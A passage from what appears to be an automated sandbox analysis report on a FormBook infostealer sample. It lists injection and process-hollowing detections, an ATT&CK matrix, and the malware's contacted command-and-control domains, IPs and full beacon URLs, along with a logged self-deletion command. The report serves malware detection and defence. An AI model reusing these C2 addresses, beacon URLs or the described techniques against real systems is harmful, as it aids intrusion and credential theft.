          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03637016 mov eax, dword ptr fs:[00000030h]7_2_03637016
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03637016 mov eax, dword ptr fs:[00000030h]7_2_03637016
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035CB02A mov eax, dword ptr fs:[00000030h]7_2_035CB02A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035CB02A mov eax, dword ptr fs:[00000030h]7_2_035CB02A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035CB02A mov eax, dword ptr fs:[00000030h]7_2_035CB02A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035CB02A mov eax, dword ptr fs:[00000030h]7_2_035CB02A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03684015 mov eax, dword ptr fs:[00000030h]7_2_03684015
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03684015 mov eax, dword ptr fs:[00000030h]7_2_03684015
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03636CF0 mov eax, dword ptr fs:[00000030h]7_2_03636CF0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03636CF0 mov eax, dword ptr fs:[00000030h]7_2_03636CF0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03636CF0 mov eax, dword ptr fs:[00000030h]7_2_03636CF0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_036714FB mov eax, dword ptr fs:[00000030h]7_2_036714FB
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0364B8D0 mov eax, dword ptr fs:[00000030h]7_2_0364B8D0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0364B8D0 mov ecx, dword ptr fs:[00000030h]7_2_0364B8D0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0364B8D0 mov eax, dword ptr fs:[00000030h]7_2_0364B8D0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0364B8D0 mov eax, dword ptr fs:[00000030h]7_2_0364B8D0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0364B8D0 mov eax, dword ptr fs:[00000030h]7_2_0364B8D0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0364B8D0 mov eax, dword ptr fs:[00000030h]7_2_0364B8D0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035B58EC mov eax, dword ptr fs:[00000030h]7_2_035B58EC
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03688CD6 mov eax, dword ptr fs:[00000030h]7_2_03688CD6
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035C849B mov eax, dword ptr fs:[00000030h]7_2_035C849B
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035B9080 mov eax, dword ptr fs:[00000030h]7_2_035B9080
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035EF0BF mov ecx, dword ptr fs:[00000030h]7_2_035EF0BF
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035EF0BF mov eax, dword ptr fs:[00000030h]7_2_035EF0BF
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035EF0BF mov eax, dword ptr fs:[00000030h]7_2_035EF0BF
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03633884 mov eax, dword ptr fs:[00000030h]7_2_03633884
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03633884 mov eax, dword ptr fs:[00000030h]7_2_03633884
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035F90AF mov eax, dword ptr fs:[00000030h]7_2_035F90AF
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E20A0 mov eax, dword ptr fs:[00000030h]7_2_035E20A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E20A0 mov eax, dword ptr fs:[00000030h]7_2_035E20A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E20A0 mov eax, dword ptr fs:[00000030h]7_2_035E20A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E20A0 mov eax, dword ptr fs:[00000030h]7_2_035E20A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E20A0 mov eax, dword ptr fs:[00000030h]7_2_035E20A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E20A0 mov eax, dword ptr fs:[00000030h]7_2_035E20A0
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess token adjusted: DebugJump to behavior

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 52.58.78.16 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 62.149.128.40 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.oikoschain.com
          Source: C:\Windows\explorer.exeDomain query: www.aizaibali.com
          Source: C:\Windows\explorer.exeDomain query: www.xn--vuq722jwngjre.com
          Source: C:\Windows\explorer.exeDomain query: www.extinctionbrews.com
          Source: C:\Windows\explorer.exeNetwork Connect: 119.59.120.26 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.doityourselfism.com
          Source: C:\Windows\explorer.exeDomain query: www.findfoodshop.com
          Source: C:\Windows\explorer.exeDomain query: www.invisiongc.net
          Source: C:\Windows\explorer.exeNetwork Connect: 162.241.62.54 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 169.62.77.158 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 103.138.88.11 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.jorgeporcayo.com
          Source: C:\Windows\explorer.exeNetwork Connect: 154.88.31.204 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.scuolatua.com
          Source: C:\Windows\explorer.exeDomain query: www.okinawarongnho.com
          Source: C:\Windows\explorer.exeDomain query: www.ecofingers.com
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeSection loaded: unknown target: C:\Users\user\Desktop\v8kZUFgdD4.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeSection loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeSection loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeThread register set: target process: 3440Jump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeThread register set: target process: 3440Jump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeSection unmapped: C:\Windows\SysWOW64\ipconfig.exe base address: 13E0000Jump to behavior
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeProcess created: C:\Users\user\Desktop\v8kZUFgdD4.exe 'C:\Users\user\Desktop\v8kZUFgdD4.exe' Jump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\v8kZUFgdD4.exe'Jump to behavior
          Source: explorer.exe, 00000005.00000000.379766787.0000000004F80000.00000004.00000001.sdmp, ipconfig.exe, 00000007.00000002.601794902.0000000005BB0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000005.00000000.343823021.0000000000EE0000.00000002.00000001.sdmp, ipconfig.exe, 00000007.00000002.601794902.0000000005BB0000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000005.00000000.343823021.0000000000EE0000.00000002.00000001.sdmp, ipconfig.exe, 00000007.00000002.601794902.0000000005BB0000.00000002.00000001.sdmpBinary or memory string: &Program Manager
          Source: explorer.exe, 00000005.00000000.343823021.0000000000EE0000.00000002.00000001.sdmp, ipconfig.exe, 00000007.00000002.601794902.0000000005BB0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 0_2_0040205A EntryPoint,GetVersion,GetStartupInfoW,GetModuleHandleA,0_2_0040205A

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0.2.v8kZUFgdD4.exe.21d0000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.v8kZUFgdD4.exe.21d0000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.v8kZUFgdD4.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.v8kZUFgdD4.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.v8kZUFgdD4.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.599150521.0000000001330000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.597969689.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.341137782.00000000021D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.389832598.00000000009F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.598432080.0000000001100000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.389732615.00000000005B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.339035509.0000000000400000.00000040.00020000.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0.2.v8kZUFgdD4.exe.21d0000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.v8kZUFgdD4.exe.21d0000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.v8kZUFgdD4.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.v8kZUFgdD4.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.v8kZUFgdD4.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.599150521.0000000001330000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.597969689.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.341137782.00000000021D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.389832598.00000000009F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.598432080.0000000001100000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.389732615.00000000005B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.339035509.0000000000400000.00000040.00020000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsNative API1Path InterceptionProcess Injection512Virtualization/Sandbox Evasion2OS Credential DumpingSecurity Software Discovery121Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsShared Modules1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection512LSASS MemoryVirtualization/Sandbox Evasion2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Deobfuscate/Decode Files or Information1Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information3NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing11LSA SecretsSystem Network Configuration Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Information Discovery12VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 452667 Sample: v8kZUFgdD4.exe Startdate: 22/07/2021 Architecture: WINDOWS Score: 100 35 www.wthcoffee.com 2->35 37 www.cwdelrio.com 2->37 39 wthcoffee.com 2->39 47 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->47 49 Found malware configuration 2->49 51 Malicious sample detected (through community Yara rule) 2->51 53 4 other signatures 2->53 11 v8kZUFgdD4.exe 2->11         started        signatures3 process4 signatures5 61 Detected unpacking (changes PE section rights) 11->61 63 Maps a DLL or memory area into another process 11->63 65 Tries to detect virtualization through RDTSC time measurements 11->65 14 v8kZUFgdD4.exe 11->14         started        process6 signatures7 67 Modifies the context of a thread in another process (thread injection) 14->67 69 Maps a DLL or memory area into another process 14->69 71 Sample uses process hollowing technique 14->71 73 Queues an APC in another process (thread injection) 14->73 17 explorer.exe 14->17 injected process8 dnsIp9 29 jorgeporcayo.com 162.241.62.54, 49763, 80 UNIFIEDLAYER-AS-1US United States 17->29 31 doityourselfism.com 169.62.77.158, 49752, 80 SOFTLAYERUS United States 17->31 33 14 other IPs or domains 17->33 43 System process connects to network (likely due to code injection or exploit) 17->43 45 Uses ipconfig to lookup or modify the Windows network settings 17->45 21 ipconfig.exe 12 17->21         started        signatures10 process11 dnsIp12 41 www.aizaibali.com 21->41 55 Modifies the context of a thread in another process (thread injection) 21->55 57 Maps a DLL or memory area into another process 21->57 59 Tries to detect virtualization through RDTSC time measurements 21->59 25 cmd.exe 1 21->25         started        signatures13 process14 process15 27 conhost.exe 25->27         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          v8kZUFgdD4.exe38%VirustotalBrowse

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          7.2.ipconfig.exe.3ac7960.5.unpack100%AviraTR/Patched.Ren.GenDownload File
          0.2.v8kZUFgdD4.exe.2190000.1.unpack100%AviraTR/Patched.Ren.GenDownload File
          7.2.ipconfig.exe.11406b0.0.unpack100%AviraTR/Patched.Ren.GenDownload File
          0.2.v8kZUFgdD4.exe.21d0000.2.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.2.v8kZUFgdD4.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.1.v8kZUFgdD4.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          extinctionbrews.com5%VirustotalBrowse
          www.aizaibali.com0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.okinawarongnho.com/dy8g/?i0GDM=uor47PkOoKkLY099HuArMxw1XFE/ncsTlzCE/ODY21NzZk1xVsb5QvrTgLDn7S7AYBCRuXEk2w==&0X=C6Ah3vPx0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.doityourselfism.com/dy8g/?i0GDM=Y4JBfBjBKMGzbUzrNu+ARLK4ZQab+dap1kq40YSvqSzyJ/mfRg4U9+Lz1eKJfRLK3cAmaa0bkw==&0X=C6Ah3vPx0%Avira URL Cloudsafe
          http://www.findfoodshop.com/dy8g/?i0GDM=4wzaECy4GBTuQnITbNLpu7AOQbyqIYrzJAsJNgGB2dTR99UQwJdt+FpFkOawEfEVdOlYoXAvoA==&0X=C6Ah3vPx100%Avira URL Cloudmalware
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.scuolatua.com/dy8g/?i0GDM=DyFQJ285GCHWDKdZkYvFextRb5KpVMjfJilCoJQfsM3+VBHaRIBYykQk9iPNEqtroWJ/WwLhcg==&0X=C6Ah3vPx0%Avira URL Cloudsafe
          http://www.extinctionbrews.com/dy8g/?i0GDM=DjnY/S7/G1yk/GGdjnbMG0pwlAlipgBY8a8MDSEvYTAaE8/8s3MkSQswoGP3cSH4hj9/IphBwA==&0X=C6Ah3vPx0%Avira URL Cloudsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.invisiongc.net/dy8g/?i0GDM=MBhh1pO56K3YrZO9qJkl6N96HaWfS+D/lXW6/vw2t4O2Fl+GB2YqMK2ZraksguVxeKRya9uu2A==&0X=C6Ah3vPx100%Avira URL Cloudmalware
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          www.extinctionbrews.com/dy8g/0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.ecofingers.com/dy8g/?i0GDM=X9Az7RthaT8xdqkxQ6tJRjQeFUHqBPh6fb7YU5dnwYv1rghxnAYW3P4f0krKlocv9Wl7uwWiww==&0X=C6Ah3vPx0%Avira URL Cloudsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.jorgeporcayo.com/dy8g/?i0GDM=q7jKWIuNsoGkf7/hAqyN1U3v/GjJJAAs8Ri7ihl8JZVwqZwISrlxTPDImUVNZCFSYJzAIvZikA==&0X=C6Ah3vPx0%Avira URL Cloudsafe
          http://www.scuolatua.com:80/dy8g/?i0GDM=DyFQJ285GCHWDKdZkYvFextRb5KpVMjfJilCoJQfsM30%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          extinctionbrews.com
          34.102.136.180
          truefalseunknown
          jorgeporcayo.com
          162.241.62.54
          truetrue
            unknown
            www.aizaibali.com
            154.88.31.204
            truetrueunknown
            invisiongc.net
            34.102.136.180
            truefalse
              unknown
              www.scuolatua.com
              62.149.128.40
              truetrue
                unknown
                www.findfoodshop.com
                119.59.120.26
                truetrue
                  unknown
                  doityourselfism.com
                  169.62.77.158
                  truetrue
                    unknown
                    okinawarongnho.com
                    103.138.88.11
                    truetrue
                      unknown
                      www.ecofingers.com
                      52.58.78.16
                      truetrue
                        unknown
                        wthcoffee.com
                        184.168.131.241
                        truetrue
                          unknown
                          www.wthcoffee.com
                          unknown
                          unknowntrue
                            unknown
                            www.oikoschain.com
                            unknown
                            unknowntrue
                              unknown
                              www.xn--vuq722jwngjre.com
                              unknown
                              unknowntrue
                                unknown
                                www.extinctionbrews.com
                                unknown
                                unknowntrue
                                  unknown
                                  www.doityourselfism.com
                                  unknown
                                  unknowntrue
                                    unknown
                                    www.cwdelrio.com
                                    unknown
                                    unknowntrue
                                      unknown
                                      www.invisiongc.net
                                      unknown
                                      unknowntrue
                                        unknown
                                        www.jorgeporcayo.com
                                        unknown
                                        unknowntrue
                                          unknown
                                          www.okinawarongnho.com
                                          unknown
                                          unknowntrue
                                            unknown

                                            Contacted URLs

                                            NameMaliciousAntivirus DetectionReputation
                                            http://www.okinawarongnho.com/dy8g/?i0GDM=uor47PkOoKkLY099HuArMxw1XFE/ncsTlzCE/ODY21NzZk1xVsb5QvrTgLDn7S7AYBCRuXEk2w==&0X=C6Ah3vPxtrue
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.doityourselfism.com/dy8g/?i0GDM=Y4JBfBjBKMGzbUzrNu+ARLK4ZQab+dap1kq40YSvqSzyJ/mfRg4U9+Lz1eKJfRLK3cAmaa0bkw==&0X=C6Ah3vPxtrue
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.findfoodshop.com/dy8g/?i0GDM=4wzaECy4GBTuQnITbNLpu7AOQbyqIYrzJAsJNgGB2dTR99UQwJdt+FpFkOawEfEVdOlYoXAvoA==&0X=C6Ah3vPxtrue
                                            • Avira URL Cloud: malware
                                            unknown
                                            http://www.scuolatua.com/dy8g/?i0GDM=DyFQJ285GCHWDKdZkYvFextRb5KpVMjfJilCoJQfsM3+VBHaRIBYykQk9iPNEqtroWJ/WwLhcg==&0X=C6Ah3vPxtrue
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.extinctionbrews.com/dy8g/?i0GDM=DjnY/S7/G1yk/GGdjnbMG0pwlAlipgBY8a8MDSEvYTAaE8/8s3MkSQswoGP3cSH4hj9/IphBwA==&0X=C6Ah3vPxfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.invisiongc.net/dy8g/?i0GDM=MBhh1pO56K3YrZO9qJkl6N96HaWfS+D/lXW6/vw2t4O2Fl+GB2YqMK2ZraksguVxeKRya9uu2A==&0X=C6Ah3vPxfalse
                                            • Avira URL Cloud: malware
                                            unknown
                                            www.extinctionbrews.com/dy8g/true
                                            • Avira URL Cloud: safe
                                            low
                                            http://www.ecofingers.com/dy8g/?i0GDM=X9Az7RthaT8xdqkxQ6tJRjQeFUHqBPh6fb7YU5dnwYv1rghxnAYW3P4f0krKlocv9Wl7uwWiww==&0X=C6Ah3vPxtrue
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.jorgeporcayo.com/dy8g/?i0GDM=q7jKWIuNsoGkf7/hAqyN1U3v/GjJJAAs8Ri7ihl8JZVwqZwISrlxTPDImUVNZCFSYJzAIvZikA==&0X=C6Ah3vPxtrue
                                            • Avira URL Cloud: safe
                                            unknown

                                            URLs from Memory and Binaries

                                            NameSourceMaliciousAntivirus DetectionReputation
                                            http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000005.00000000.343561590.000000000095C000.00000004.00000020.sdmpfalse
                                              high
                                              http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmpfalse
                                                high
                                                http://www.fontbureau.comexplorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmpfalse
                                                  high
                                                  http://www.fontbureau.com/designersGexplorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmpfalse
                                                    high
                                                    http://www.fontbureau.com/designers/?explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmpfalse
                                                      high
                                                      http://www.founder.com.cn/cn/bTheexplorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.fontbureau.com/designers?explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmpfalse
                                                        high
                                                        http://www.tiro.comexplorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://www.fontbureau.com/designersexplorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmpfalse
                                                          high
                                                          http://www.goodfont.co.krexplorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.carterandcone.comlexplorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.sajatypeworks.comexplorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.typography.netDexplorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmpfalse
                                                            high
                                                            http://www.founder.com.cn/cn/cTheexplorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://fontfabrik.comexplorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.founder.com.cn/cnexplorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.fontbureau.com/designers/frere-jones.htmlexplorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmpfalse
                                                              high
                                                              http://www.jiyu-kobo.co.jp/explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
